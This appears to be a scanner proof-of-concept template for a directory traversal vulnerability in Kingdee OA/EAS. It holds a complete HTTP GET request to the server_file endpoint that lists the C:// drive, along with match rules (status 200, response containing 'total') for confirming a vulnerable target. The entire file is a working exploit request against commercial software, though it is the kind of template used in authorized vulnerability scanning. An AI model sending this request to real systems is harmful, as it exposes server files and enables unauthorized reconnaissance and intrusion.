<DudePoc_Name>金蝶OA server_file 目录遍历漏洞 测一</DudePoc_Name>
<DudePoc_Description>金蝶EAS存在目录遍历漏洞，攻击者可利用该漏洞获取服务器敏感信息。</DudePoc_Description>
<DudePoc_SetHeader>
GET /appmonitor/protected/selector/server_file/files?folder=C://&suffix= HTTP/1.1
Host: $<AttackHost>$
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>

</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>total</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
